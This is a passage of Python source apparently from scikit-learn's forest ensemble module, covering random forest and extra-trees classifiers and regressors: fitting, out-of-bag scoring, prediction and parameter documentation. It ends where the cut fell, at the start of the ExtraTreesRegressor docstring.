        X = self._validate_X_predict(X)
        # threading backend: tree.apply releases the GIL in its Cython code
        results = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
                           backend="threading")(
            delayed(_parallel_helper)(tree, 'apply', X, check_input=False)
            for tree in self.estimators_)

        return np.array(results).T

    def fit(self, X, y, sample_weight=None):
        """Build a forest of trees from the training set (X, y).

        Parameters
        ----------
        X : array-like or sparse matrix of shape = [n_samples, n_features]
            The training input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csc_matrix``.

        y : array-like, shape = [n_samples] or [n_samples, n_outputs]
            The target values (class labels in classification, real numbers in
            regression).

        sample_weight : array-like, shape = [n_samples] or None
            Sample weights. If None, then samples are equally weighted. Splits
            that would create child nodes with net zero or negative weight are
            ignored while searching for a split in each node. In the case of
            classification, splits are also ignored if they would result in any
            single class carrying a negative weight in either child node.

        Returns
        -------
        self : object
            Returns self.
        """
        # Validate or convert input data
        X = check_array(X, dtype=DTYPE, accept_sparse="csc")
        if issparse(X):
            # Pre-sort indices to avoid that each individual tree of the
            # ensemble sorts the indices.
            X.sort_indices()

        # Remap output
        n_samples, self.n_features_ = X.shape

        y = np.atleast_1d(y)
        if y.ndim == 2 and y.shape[1] == 1:
            warn("A column-vector y was passed when a 1d array was"
                 " expected. Please change the shape of y to "
                 "(n_samples,), for example using ravel().",
                 DataConversionWarning, stacklevel=2)

        if y.ndim == 1:
            # reshape is necessary to preserve the data contiguity against vs
            # [:, np.newaxis] that does not.
            y = np.reshape(y, (-1, 1))

        self.n_outputs_ = y.shape[1]

        y, expanded_class_weight = self._validate_y_class_weight(y)

        if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
            y = np.ascontiguousarray(y, dtype=DOUBLE)

        if expanded_class_weight is not None:
            # fold the per-sample class weights into the sample weights
            if sample_weight is not None:
                sample_weight = sample_weight * expanded_class_weight
            else:
                sample_weight = expanded_class_weight

        # Check parameters
        self._validate_estimator()

        if not self.bootstrap and self.oob_score:
            raise ValueError("Out of bag estimation only available"
                             " if bootstrap=True")

        random_state = check_random_state(self.random_state)

        if not self.warm_start:
            # Free allocated memory, if any
            self.estimators_ = []

        n_more_estimators = self.n_estimators - len(self.estimators_)

        if n_more_estimators < 0:
            raise ValueError('n_estimators=%d must be larger or equal to '
                             'len(estimators_)=%d when warm_start==True'
                             % (self.n_estimators, len(self.estimators_)))

        elif n_more_estimators == 0:
            warn("Warm-start fitting without increasing n_estimators does not "
                 "fit new trees.")
        else:
            if self.warm_start and len(self.estimators_) > 0:
                # We draw from the random state to get the random state we
                # would have got if we hadn't used a warm_start.
                random_state.randint(MAX_INT, size=len(self.estimators_))

            trees = []
            for i in range(n_more_estimators):
                tree = self._make_estimator(append=False)
                tree.set_params(random_state=random_state.randint(MAX_INT))
                trees.append(tree)

            # Parallel loop: we use the threading backend as the Cython code
            # for fitting the trees is internally releasing the Python GIL
            # making threading always more efficient than multiprocessing in
            # that case.
            trees = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
                             backend="threading")(
                delayed(_parallel_build_trees)(
                    t, self, X, y, sample_weight, i, len(trees),
                    verbose=self.verbose, class_weight=self.class_weight)
                for i, t in enumerate(trees))

            # Collect newly grown trees
            self.estimators_.extend(trees)

        if self.oob_score:
            self._set_oob_score(X, y)

        # Decapsulate classes_ attributes
        if hasattr(self, "classes_") and self.n_outputs_ == 1:
            self.n_classes_ = self.n_classes_[0]
            self.classes_ = self.classes_[0]

        return self

    @abstractmethod
    def _set_oob_score(self, X, y):
        """Calculate out of bag predictions and score."""

    def _validate_y_class_weight(self, y):
        # Default implementation (regressors): no remapping, no class weights
        return y, None

    def _validate_X_predict(self, X):
        """Validate X whenever one tries to predict, apply, predict_proba"""
        if self.estimators_ is None or len(self.estimators_) == 0:
            raise NotFittedError("Estimator not fitted, "
                                 "call `fit` before exploiting the model.")

        # delegate the actual validation to the first fitted tree
        return self.estimators_[0]._validate_X_predict(X, check_input=True)

    @property
    def feature_importances_(self):
        """Return the feature importances (the higher, the more important the
        feature).

        Returns
        -------
        feature_importances_ : array, shape = [n_features]
        """
        if self.estimators_ is None or len(self.estimators_) == 0:
            raise NotFittedError("Estimator not fitted, "
                                 "call `fit` before `feature_importances_`.")

        # mean of the per-tree importances
        all_importances = Parallel(n_jobs=self.n_jobs,
                                   backend="threading")(
            delayed(getattr)(tree, 'feature_importances_')
            for tree in self.estimators_)

        return sum(all_importances) / len(self.estimators_)
class ForestClassifier(six.with_metaclass(ABCMeta, BaseForest,
                                          ClassifierMixin)):
    """Base class for forest of trees-based classifiers.

    Warning: This class should not be used directly. Use derived classes
    instead.
    """

    @abstractmethod
    def __init__(self,
                 base_estimator,
                 n_estimators=10,
                 estimator_params=tuple(),
                 bootstrap=False,
                 oob_score=False,
                 n_jobs=1,
                 random_state=None,
                 verbose=0,
                 warm_start=False,
                 class_weight=None):
        super(ForestClassifier, self).__init__(
            base_estimator,
            n_estimators=n_estimators,
            estimator_params=estimator_params,
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start,
            class_weight=class_weight)

    def _set_oob_score(self, X, y):
        """Compute out-of-bag score"""
        X = check_array(X, dtype=DTYPE, accept_sparse='csr')

        n_classes_ = self.n_classes_
        n_samples = y.shape[0]

        oob_decision_function = []
        oob_score = 0.0
        predictions = []

        for k in range(self.n_outputs_):
            predictions.append(np.zeros((n_samples, n_classes_[k])))

        for estimator in self.estimators_:
            # Score each tree only on the samples left out of its
            # bootstrap draw.
            unsampled_indices = _generate_unsampled_indices(
                estimator.random_state, n_samples)
            p_estimator = estimator.predict_proba(X[unsampled_indices, :],
                                                  check_input=False)

            if self.n_outputs_ == 1:
                p_estimator = [p_estimator]

            for k in range(self.n_outputs_):
                predictions[k][unsampled_indices, :] += p_estimator[k]

        for k in range(self.n_outputs_):
            if (predictions[k].sum(axis=1) == 0).any():
                warn("Some inputs do not have OOB scores. "
                     "This probably means too few trees were used "
                     "to compute any reliable oob estimates.")

            decision = (predictions[k] /
                        predictions[k].sum(axis=1)[:, np.newaxis])
            oob_decision_function.append(decision)
            oob_score += np.mean(y[:, k] ==
                                 np.argmax(predictions[k], axis=1), axis=0)

        if self.n_outputs_ == 1:
            self.oob_decision_function_ = oob_decision_function[0]
        else:
            self.oob_decision_function_ = oob_decision_function

        self.oob_score_ = oob_score / self.n_outputs_

    def _validate_y_class_weight(self, y):
        """Label-encode ``y`` and expand ``class_weight`` into sample weights.

        Returns the encoded targets and, when ``class_weight`` is set, the
        per-sample weights computed from the *original* labels (``None``
        otherwise). Also populates ``classes_`` and ``n_classes_``.
        """
        y = np.copy(y)
        expanded_class_weight = None

        if self.class_weight is not None:
            # compute_sample_weight must see the original labels, not the
            # encoded indices produced below.
            y_original = np.copy(y)

        self.classes_ = []
        self.n_classes_ = []

        # BUGFIX: ``np.int`` was a deprecated alias of the builtin ``int``
        # and was removed in NumPy 1.24; use the builtin type directly.
        y_store_unique_indices = np.zeros(y.shape, dtype=int)
        for k in range(self.n_outputs_):
            classes_k, y_store_unique_indices[:, k] = np.unique(y[:, k], return_inverse=True)
            self.classes_.append(classes_k)
            self.n_classes_.append(classes_k.shape[0])
        y = y_store_unique_indices

        if self.class_weight is not None:
            # BUGFIX: 'auto' was listed twice in the original tuple.
            valid_presets = ('auto', 'balanced', 'balanced_subsample',
                             'subsample')
            if isinstance(self.class_weight, six.string_types):
                if self.class_weight not in valid_presets:
                    raise ValueError('Valid presets for class_weight include '
                                     '"balanced" and "balanced_subsample". Given "%s".'
                                     % self.class_weight)
                if self.class_weight == "subsample":
                    warn("class_weight='subsample' is deprecated and will be removed in 0.18."
                         " It was replaced by class_weight='balanced_subsample' "
                         "using the balanced strategy.", DeprecationWarning)
                if self.warm_start:
                    warn('class_weight presets "balanced" or "balanced_subsample" are '
                         'not recommended for warm_start if the fitted data '
                         'differs from the full dataset. In order to use '
                         '"balanced" weights, use compute_class_weight("balanced", '
                         'classes, y). In place of y you can use a large '
                         'enough sample of the full training set target to '
                         'properly estimate the class frequency '
                         'distributions. Pass the resulting weights as the '
                         'class_weight parameter.')

            if (self.class_weight not in ['subsample', 'balanced_subsample'] or
                    not self.bootstrap):
                # The *_subsample presets with bootstrap are expanded
                # per-tree on each bootstrap sample; everything else is
                # expanded once here on the full training set.
                if self.class_weight == 'subsample':
                    class_weight = 'auto'
                elif self.class_weight == "balanced_subsample":
                    class_weight = "balanced"
                else:
                    class_weight = self.class_weight
                with warnings.catch_warnings():
                    if class_weight == "auto":
                        warnings.simplefilter('ignore', DeprecationWarning)
                    expanded_class_weight = compute_sample_weight(class_weight,
                                                                  y_original)

        return y, expanded_class_weight

    def predict(self, X):
        """Predict class for X.
        The predicted class of an input sample is a vote by the trees in
        the forest, weighted by their probability estimates. That is,
        the predicted class is the one with highest mean probability
        estimate across the trees.
        Parameters
        ----------
        X : array-like or sparse matrix of shape = [n_samples, n_features]
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.
        Returns
        -------
        y : array of shape = [n_samples] or [n_samples, n_outputs]
            The predicted classes.
        """
        proba = self.predict_proba(X)

        if self.n_outputs_ == 1:
            return self.classes_.take(np.argmax(proba, axis=1), axis=0)
        else:
            n_samples = proba[0].shape[0]
            predictions = np.zeros((n_samples, self.n_outputs_))

            # Decode each output's argmax back to its original class labels.
            for k in range(self.n_outputs_):
                predictions[:, k] = self.classes_[k].take(np.argmax(proba[k],
                                                                    axis=1),
                                                          axis=0)
            return predictions

    def predict_proba(self, X):
        """Predict class probabilities for X.
        The predicted class probabilities of an input sample is computed as
        the mean predicted class probabilities of the trees in the forest. The
        class probability of a single tree is the fraction of samples of the same
        class in a leaf.
        Parameters
        ----------
        X : array-like or sparse matrix of shape = [n_samples, n_features]
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.
        Returns
        -------
        p : array of shape = [n_samples, n_classes], or a list of n_outputs
            such arrays if n_outputs > 1.
            The class probabilities of the input samples. The order of the
            classes corresponds to that in the attribute `classes_`.
        """
        # Check data
        X = self._validate_X_predict(X)

        # Assign chunk of trees to jobs
        n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs)

        # Parallel loop
        all_proba = Parallel(n_jobs=n_jobs, verbose=self.verbose,
                             backend="threading")(
            delayed(_parallel_helper)(e, 'predict_proba', X,
                                      check_input=False)
            for e in self.estimators_)

        # Reduce: sum the per-tree probabilities, then normalize by the
        # number of fitted trees.
        proba = all_proba[0]

        if self.n_outputs_ == 1:
            for j in range(1, len(all_proba)):
                proba += all_proba[j]

            proba /= len(self.estimators_)

        else:
            for j in range(1, len(all_proba)):
                for k in range(self.n_outputs_):
                    proba[k] += all_proba[j][k]

            for k in range(self.n_outputs_):
                # CONSISTENCY FIX: divide by len(self.estimators_) as in the
                # single-output branch above (was self.n_estimators).
                proba[k] /= len(self.estimators_)

        return proba

    def predict_log_proba(self, X):
        """Predict class log-probabilities for X.
        The predicted class log-probabilities of an input sample is computed as
        the log of the mean predicted class probabilities of the trees in the
        forest.
        Parameters
        ----------
        X : array-like or sparse matrix of shape = [n_samples, n_features]
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.
        Returns
        -------
        p : array of shape = [n_samples, n_classes], or a list of n_outputs
            such arrays if n_outputs > 1.
            The class probabilities of the input samples. The order of the
            classes corresponds to that in the attribute `classes_`.
        """
        proba = self.predict_proba(X)

        if self.n_outputs_ == 1:
            return np.log(proba)

        else:
            for k in range(self.n_outputs_):
                proba[k] = np.log(proba[k])

            return proba
class ForestRegressor(six.with_metaclass(ABCMeta, BaseForest, RegressorMixin)):
    """Base class for forest of trees-based regressors.

    Warning: This class should not be used directly. Use derived classes
    instead.
    """

    @abstractmethod
    def __init__(self,
                 base_estimator,
                 n_estimators=10,
                 estimator_params=tuple(),
                 bootstrap=False,
                 oob_score=False,
                 n_jobs=1,
                 random_state=None,
                 verbose=0,
                 warm_start=False):
        super(ForestRegressor, self).__init__(
            base_estimator,
            n_estimators=n_estimators,
            estimator_params=estimator_params,
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start)

    def predict(self, X):
        """Predict regression target for X.
        The predicted regression target of an input sample is computed as the
        mean predicted regression targets of the trees in the forest.
        Parameters
        ----------
        X : array-like or sparse matrix of shape = [n_samples, n_features]
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.
        Returns
        -------
        y : array of shape = [n_samples] or [n_samples, n_outputs]
            The predicted values.
        """
        X = self._validate_X_predict(X)

        # Spread the trees over the available jobs.
        n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs)

        per_tree_pred = Parallel(n_jobs=n_jobs, verbose=self.verbose,
                                 backend="threading")(
            delayed(_parallel_helper)(tree, 'predict', X, check_input=False)
            for tree in self.estimators_)

        # The forest prediction is the mean of the per-tree predictions.
        return sum(per_tree_pred) / len(self.estimators_)

    def _set_oob_score(self, X, y):
        """Compute out-of-bag scores"""
        X = check_array(X, dtype=DTYPE, accept_sparse='csr')

        n_samples = y.shape[0]
        oob_pred = np.zeros((n_samples, self.n_outputs_))
        oob_counts = np.zeros((n_samples, self.n_outputs_))

        for tree in self.estimators_:
            # Evaluate each tree only on the samples it never saw during
            # its bootstrap draw.
            left_out = _generate_unsampled_indices(
                tree.random_state, n_samples)
            tree_pred = tree.predict(
                X[left_out, :], check_input=False)

            if self.n_outputs_ == 1:
                tree_pred = tree_pred[:, np.newaxis]

            oob_pred[left_out, :] += tree_pred
            oob_counts[left_out, :] += 1

        if (oob_counts == 0).any():
            warn("Some inputs do not have OOB scores. "
                 "This probably means too few trees were used "
                 "to compute any reliable oob estimates.")
            # Avoid division by zero for samples with no OOB prediction.
            oob_counts[oob_counts == 0] = 1

        oob_pred /= oob_counts
        self.oob_prediction_ = oob_pred

        if self.n_outputs_ == 1:
            self.oob_prediction_ = \
                self.oob_prediction_.reshape((n_samples, ))

        # Average the per-output R^2 scores.
        total_score = 0.0
        for k in range(self.n_outputs_):
            total_score += r2_score(y[:, k], oob_pred[:, k])
        self.oob_score_ = total_score / self.n_outputs_
class RandomForestClassifier(ForestClassifier):
    """A random forest classifier.
    A random forest is a meta estimator that fits a number of decision tree
    classifiers on various sub-samples of the dataset and use averaging to
    improve the predictive accuracy and control over-fitting.
    The sub-sample size is always the same as the original
    input sample size but the samples are drawn with replacement if
    `bootstrap=True` (default).
    Read more in the :ref:`User Guide <forest>`.
    Parameters
    ----------
    n_estimators : integer, optional (default=10)
        The number of trees in the forest.
    criterion : string, optional (default="gini")
        The function to measure the quality of a split. Supported criteria are
        "gini" for the Gini impurity and "entropy" for the information gain.
        Note: this parameter is tree-specific.
    max_features : int, float, string or None, optional (default="auto")
        The number of features to consider when looking for the best split:
        - If int, then consider `max_features` features at each split.
        - If float, then `max_features` is a percentage and
          `int(max_features * n_features)` features are considered at each
          split.
        - If "auto", then `max_features=sqrt(n_features)`.
        - If "sqrt", then `max_features=sqrt(n_features)` (same as "auto").
        - If "log2", then `max_features=log2(n_features)`.
        - If None, then `max_features=n_features`.
        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires to
        effectively inspect more than ``max_features`` features.
        Note: this parameter is tree-specific.
    max_depth : integer or None, optional (default=None)
        The maximum depth of the tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.
        Ignored if ``max_leaf_nodes`` is not None.
        Note: this parameter is tree-specific.
    min_samples_split : integer, optional (default=2)
        The minimum number of samples required to split an internal node.
        Note: this parameter is tree-specific.
    min_samples_leaf : integer, optional (default=1)
        The minimum number of samples in newly created leaves. A split is
        discarded if after the split, one of the leaves would contain less than
        ``min_samples_leaf`` samples.
        Note: this parameter is tree-specific.
    min_weight_fraction_leaf : float, optional (default=0.)
        The minimum weighted fraction of the input samples required to be at a
        leaf node.
        Note: this parameter is tree-specific.
    max_leaf_nodes : int or None, optional (default=None)
        Grow trees with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.
        If not None then ``max_depth`` will be ignored.
        Note: this parameter is tree-specific.
    bootstrap : boolean, optional (default=True)
        Whether bootstrap samples are used when building trees.
    oob_score : bool
        Whether to use out-of-bag samples to estimate
        the generalization error.
    n_jobs : integer, optional (default=1)
        The number of jobs to run in parallel for both `fit` and `predict`.
        If -1, then the number of jobs is set to the number of cores.
    random_state : int, RandomState instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`.
    verbose : int, optional (default=0)
        Controls the verbosity of the tree building process.
    warm_start : bool, optional (default=False)
        When set to ``True``, reuse the solution of the previous call to fit
        and add more estimators to the ensemble, otherwise, just fit a whole
        new forest.
    class_weight : dict, list of dicts, "balanced", "balanced_subsample" or None, optional
        Weights associated with classes in the form ``{class_label: weight}``.
        If not given, all classes are supposed to have weight one. For
        multi-output problems, a list of dicts can be provided in the same
        order as the columns of y.
        The "balanced" mode uses the values of y to automatically adjust
        weights inversely proportional to class frequencies in the input data
        as ``n_samples / (n_classes * np.bincount(y))``
        The "balanced_subsample" mode is the same as "balanced" except that weights are
        computed based on the bootstrap sample for every tree grown.
        For multi-output, the weights of each column of y will be multiplied.
        Note that these weights will be multiplied with sample_weight (passed
        through the fit method) if sample_weight is specified.
    Attributes
    ----------
    estimators_ : list of DecisionTreeClassifier
        The collection of fitted sub-estimators.
    classes_ : array of shape = [n_classes] or a list of such arrays
        The classes labels (single output problem), or a list of arrays of
        class labels (multi-output problem).
    n_classes_ : int or list
        The number of classes (single output problem), or a list containing the
        number of classes for each output (multi-output problem).
    n_features_ : int
        The number of features when ``fit`` is performed.
    n_outputs_ : int
        The number of outputs when ``fit`` is performed.
    feature_importances_ : array of shape = [n_features]
        The feature importances (the higher, the more important the feature).
    oob_score_ : float
        Score of the training dataset obtained using an out-of-bag estimate.
    oob_decision_function_ : array of shape = [n_samples, n_classes]
        Decision function computed with out-of-bag estimate on the training
        set. If n_estimators is small it might be possible that a data point
        was never left out during the bootstrap. In this case,
        `oob_decision_function_` might contain NaN.
    References
    ----------
    .. [1] L. Breiman, "Random Forests", Machine Learning, 45(1), 5-32, 2001.
    See also
    --------
    DecisionTreeClassifier, ExtraTreesClassifier
    """
    def __init__(self,
                 n_estimators=10,
                 criterion="gini",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 max_leaf_nodes=None,
                 bootstrap=True,
                 oob_score=False,
                 n_jobs=1,
                 random_state=None,
                 verbose=0,
                 warm_start=False,
                 class_weight=None):
        super(RandomForestClassifier, self).__init__(
            base_estimator=DecisionTreeClassifier(),
            n_estimators=n_estimators,
            estimator_params=("criterion", "max_depth", "min_samples_split",
                              "min_samples_leaf", "min_weight_fraction_leaf",
                              "max_features", "max_leaf_nodes",
                              "random_state"),
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start,
            class_weight=class_weight)
        # Tree-specific hyper-parameters: each name listed in
        # ``estimator_params`` above is copied onto every fitted tree.
        self.criterion = criterion
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_features = max_features
        self.max_leaf_nodes = max_leaf_nodes
class RandomForestRegressor(ForestRegressor):
    """A random forest regressor.
    A random forest is a meta estimator that fits a number of classifying
    decision trees on various sub-samples of the dataset and use averaging
    to improve the predictive accuracy and control over-fitting.
    The sub-sample size is always the same as the original
    input sample size but the samples are drawn with replacement if
    `bootstrap=True` (default).
    Read more in the :ref:`User Guide <forest>`.
    Parameters
    ----------
    n_estimators : integer, optional (default=10)
        The number of trees in the forest.
    criterion : string, optional (default="mse")
        The function to measure the quality of a split. The only supported
        criterion is "mse" for the mean squared error.
        Note: this parameter is tree-specific.
    max_features : int, float, string or None, optional (default="auto")
        The number of features to consider when looking for the best split:
        - If int, then consider `max_features` features at each split.
        - If float, then `max_features` is a percentage and
          `int(max_features * n_features)` features are considered at each
          split.
        - If "auto", then `max_features=n_features`.
        - If "sqrt", then `max_features=sqrt(n_features)`.
        - If "log2", then `max_features=log2(n_features)`.
        - If None, then `max_features=n_features`.
        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires to
        effectively inspect more than ``max_features`` features.
        Note: this parameter is tree-specific.
    max_depth : integer or None, optional (default=None)
        The maximum depth of the tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.
        Ignored if ``max_leaf_nodes`` is not None.
        Note: this parameter is tree-specific.
    min_samples_split : integer, optional (default=2)
        The minimum number of samples required to split an internal node.
        Note: this parameter is tree-specific.
    min_samples_leaf : integer, optional (default=1)
        The minimum number of samples in newly created leaves. A split is
        discarded if after the split, one of the leaves would contain less than
        ``min_samples_leaf`` samples.
        Note: this parameter is tree-specific.
    min_weight_fraction_leaf : float, optional (default=0.)
        The minimum weighted fraction of the input samples required to be at a
        leaf node.
        Note: this parameter is tree-specific.
    max_leaf_nodes : int or None, optional (default=None)
        Grow trees with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.
        If not None then ``max_depth`` will be ignored.
        Note: this parameter is tree-specific.
    bootstrap : boolean, optional (default=True)
        Whether bootstrap samples are used when building trees.
    oob_score : bool
        whether to use out-of-bag samples to estimate
        the generalization error.
    n_jobs : integer, optional (default=1)
        The number of jobs to run in parallel for both `fit` and `predict`.
        If -1, then the number of jobs is set to the number of cores.
    random_state : int, RandomState instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`.
    verbose : int, optional (default=0)
        Controls the verbosity of the tree building process.
    warm_start : bool, optional (default=False)
        When set to ``True``, reuse the solution of the previous call to fit
        and add more estimators to the ensemble, otherwise, just fit a whole
        new forest.
    Attributes
    ----------
    estimators_ : list of DecisionTreeRegressor
        The collection of fitted sub-estimators.
    feature_importances_ : array of shape = [n_features]
        The feature importances (the higher, the more important the feature).
    n_features_ : int
        The number of features when ``fit`` is performed.
    n_outputs_ : int
        The number of outputs when ``fit`` is performed.
    oob_score_ : float
        Score of the training dataset obtained using an out-of-bag estimate.
    oob_prediction_ : array of shape = [n_samples]
        Prediction computed with out-of-bag estimate on the training set.
    References
    ----------
    .. [1] L. Breiman, "Random Forests", Machine Learning, 45(1), 5-32, 2001.
    See also
    --------
    DecisionTreeRegressor, ExtraTreesRegressor
    """
    def __init__(self,
                 n_estimators=10,
                 criterion="mse",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 max_leaf_nodes=None,
                 bootstrap=True,
                 oob_score=False,
                 n_jobs=1,
                 random_state=None,
                 verbose=0,
                 warm_start=False):
        super(RandomForestRegressor, self).__init__(
            base_estimator=DecisionTreeRegressor(),
            n_estimators=n_estimators,
            estimator_params=("criterion", "max_depth", "min_samples_split",
                              "min_samples_leaf", "min_weight_fraction_leaf",
                              "max_features", "max_leaf_nodes",
                              "random_state"),
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start)
        # Tree-specific hyper-parameters: each name listed in
        # ``estimator_params`` above is copied onto every fitted tree.
        self.criterion = criterion
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_features = max_features
        self.max_leaf_nodes = max_leaf_nodes
class ExtraTreesClassifier(ForestClassifier):
    """An extra-trees classifier.
    This class implements a meta estimator that fits a number of
    randomized decision trees (a.k.a. extra-trees) on various sub-samples
    of the dataset and use averaging to improve the predictive accuracy
    and control over-fitting.
    Read more in the :ref:`User Guide <forest>`.
    Parameters
    ----------
    n_estimators : integer, optional (default=10)
        The number of trees in the forest.
    criterion : string, optional (default="gini")
        The function to measure the quality of a split. Supported criteria are
        "gini" for the Gini impurity and "entropy" for the information gain.
        Note: this parameter is tree-specific.
    max_features : int, float, string or None, optional (default="auto")
        The number of features to consider when looking for the best split:
        - If int, then consider `max_features` features at each split.
        - If float, then `max_features` is a percentage and
          `int(max_features * n_features)` features are considered at each
          split.
        - If "auto", then `max_features=sqrt(n_features)`.
        - If "sqrt", then `max_features=sqrt(n_features)`.
        - If "log2", then `max_features=log2(n_features)`.
        - If None, then `max_features=n_features`.
        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires to
        effectively inspect more than ``max_features`` features.
        Note: this parameter is tree-specific.
    max_depth : integer or None, optional (default=None)
        The maximum depth of the tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.
        Ignored if ``max_leaf_nodes`` is not None.
        Note: this parameter is tree-specific.
    min_samples_split : integer, optional (default=2)
        The minimum number of samples required to split an internal node.
        Note: this parameter is tree-specific.
    min_samples_leaf : integer, optional (default=1)
        The minimum number of samples in newly created leaves. A split is
        discarded if after the split, one of the leaves would contain less than
        ``min_samples_leaf`` samples.
        Note: this parameter is tree-specific.
    min_weight_fraction_leaf : float, optional (default=0.)
        The minimum weighted fraction of the input samples required to be at a
        leaf node.
        Note: this parameter is tree-specific.
    max_leaf_nodes : int or None, optional (default=None)
        Grow trees with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.
        If not None then ``max_depth`` will be ignored.
        Note: this parameter is tree-specific.
    bootstrap : boolean, optional (default=False)
        Whether bootstrap samples are used when building trees.
    oob_score : bool
        Whether to use out-of-bag samples to estimate
        the generalization error.
    n_jobs : integer, optional (default=1)
        The number of jobs to run in parallel for both `fit` and `predict`.
        If -1, then the number of jobs is set to the number of cores.
    random_state : int, RandomState instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`.
    verbose : int, optional (default=0)
        Controls the verbosity of the tree building process.
    warm_start : bool, optional (default=False)
        When set to ``True``, reuse the solution of the previous call to fit
        and add more estimators to the ensemble, otherwise, just fit a whole
        new forest.
    class_weight : dict, list of dicts, "balanced", "balanced_subsample" or None, optional
        Weights associated with classes in the form ``{class_label: weight}``.
        If not given, all classes are supposed to have weight one. For
        multi-output problems, a list of dicts can be provided in the same
        order as the columns of y.
        The "balanced" mode uses the values of y to automatically adjust
        weights inversely proportional to class frequencies in the input data
        as ``n_samples / (n_classes * np.bincount(y))``
        The "balanced_subsample" mode is the same as "balanced" except that weights are
        computed based on the bootstrap sample for every tree grown.
        For multi-output, the weights of each column of y will be multiplied.
        Note that these weights will be multiplied with sample_weight (passed
        through the fit method) if sample_weight is specified.
    Attributes
    ----------
    estimators_ : list of DecisionTreeClassifier
        The collection of fitted sub-estimators.
    classes_ : array of shape = [n_classes] or a list of such arrays
        The classes labels (single output problem), or a list of arrays of
        class labels (multi-output problem).
    n_classes_ : int or list
        The number of classes (single output problem), or a list containing the
        number of classes for each output (multi-output problem).
    feature_importances_ : array of shape = [n_features]
        The feature importances (the higher, the more important the feature).
    n_features_ : int
        The number of features when ``fit`` is performed.
    n_outputs_ : int
        The number of outputs when ``fit`` is performed.
    oob_score_ : float
        Score of the training dataset obtained using an out-of-bag estimate.
    oob_decision_function_ : array of shape = [n_samples, n_classes]
        Decision function computed with out-of-bag estimate on the training
        set. If n_estimators is small it might be possible that a data point
        was never left out during the bootstrap. In this case,
        `oob_decision_function_` might contain NaN.
    References
    ----------
    .. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
           Machine Learning, 63(1), 3-42, 2006.
    See also
    --------
    sklearn.tree.ExtraTreeClassifier : Base classifier for this ensemble.
    RandomForestClassifier : Ensemble Classifier based on trees with optimal
        splits.
    """
    def __init__(self,
                 n_estimators=10,
                 criterion="gini",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 max_leaf_nodes=None,
                 bootstrap=False,
                 oob_score=False,
                 n_jobs=1,
                 random_state=None,
                 verbose=0,
                 warm_start=False,
                 class_weight=None):
        super(ExtraTreesClassifier, self).__init__(
            base_estimator=ExtraTreeClassifier(),
            n_estimators=n_estimators,
            estimator_params=("criterion", "max_depth", "min_samples_split",
                              "min_samples_leaf", "min_weight_fraction_leaf",
                              "max_features", "max_leaf_nodes", "random_state"),
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start,
            class_weight=class_weight)
        # Tree-specific hyper-parameters: each name listed in
        # ``estimator_params`` above is copied onto every fitted tree.
        self.criterion = criterion
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_features = max_features
        self.max_leaf_nodes = max_leaf_nodes
class ExtraTreesRegressor(ForestRegressor):
"""An extra-trees regressor.
This class implements a meta estimator that fits a number of
randomized decision trees (a.k.a. extra-trees) on various sub-samples
